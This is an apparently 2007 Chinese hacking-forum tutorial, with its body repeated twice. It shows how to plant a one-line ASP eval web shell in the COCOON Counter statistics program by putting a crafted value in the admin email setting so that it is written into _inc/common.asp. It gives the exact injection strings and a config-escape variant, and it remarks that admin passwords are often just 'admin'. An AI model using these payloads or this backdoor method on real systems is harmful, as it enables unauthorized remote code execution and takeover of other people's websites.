COCOON Counter統(tǒng)計程序后臺寫馬
更新時間:2007年01月16日 00:00:00 作者:
來源:邪惡八進制 作者:9xiao
引用最新海洋頂端eval版中的幾句話,這里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己寫的代碼就是添用2006X2.exe轉(zhuǎn)換后生成的那個html文本框里的代碼。什么是文本框大家知道吧?不知的就去查查html吧。這樣添好了,就可以用自己的做的c端了。如果不會,你就用我的那個現(xiàn)成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己變形吧,不多說了"
偶在本地架設了一個環(huán)境,實際操作中不能寫錯否則后悔就來不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//復制過去,,點擊保存,看下_inc/common.asp的內(nèi)容
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"嘿嘿來執(zhí)行下,嘿嘿!成功了,統(tǒng)計程序中的后臺拿將"轉(zhuǎn)義成了\"所以這用了evalrequest(chr(35))嘿嘿,//是注釋,:在asp中就是換行,前提就是你能進到后臺,(好多后臺管理密碼都是admin嘿嘿)php也可以這樣的嘿嘿,而且比asp利用的地方更多!需要動下配置語句的前后搭配好,利用好一些符號。
另注:黑防8期也提到了類似方法這里就貼出來,黑防中的代碼可以寫成9xiao"%><%eval request(chr(35))%><%',這個方法也比較巧妙,//和'在asp都是注釋語句!此統(tǒng)計程序還有暴庫的地方這個就不公布了!
關于php的可以參考saiy寫的phpwind后臺得shell的三種方法。
引用最新海洋頂端eval版中的幾句話,這里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己寫的代碼就是添用2006X2.exe轉(zhuǎn)換后生成的那個html文本框里的代碼。什么是文本框大家知道吧?不知的就去查查html吧。這樣添好了,就可以用自己的做的c端了。如果不會,你就用我的那個現(xiàn)成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己變形吧,不多說了"
偶在本地架設了一個環(huán)境,實際操作中不能寫錯否則后悔就來不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//復制過去,,點擊保存,看下_inc/common.asp的內(nèi)容
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"嘿嘿來執(zhí)行下,嘿嘿!成功了,統(tǒng)計程序中的后臺拿將"轉(zhuǎn)義成了\"所以這用了evalrequest(chr(35))嘿嘿,//是注釋,:在asp中就是換行,前提就是你能進到后臺,(好多后臺管理密碼都是admin嘿嘿)php也可以這樣的嘿嘿,而且比asp利用的地方更多!需要動下配置語句的前后搭配好,利用好一些符號。
另注:黑防8期也提到了類似方法這里就貼出來,黑防中的代碼可以寫成9xiao"%><%eval request(chr(35))%><%',這個方法也比較巧妙,//和'在asp都是注釋語句!此統(tǒng)計程序還有暴庫的地方這個就不公布了!
關于php的可以參考saiy寫的phpwind后臺得shell的三種方法。
相關文章
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡硬盤漏洞
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡硬盤漏洞...2007-01-01
google hack dat 又增加的一些比較新的數(shù)據(jù)
google hack dat 又增加的一些比較新的數(shù)據(jù)2007-01-01
Sql Injection in DB2數(shù)據(jù)庫
Sql Injection in DB2數(shù)據(jù)庫...2007-01-01

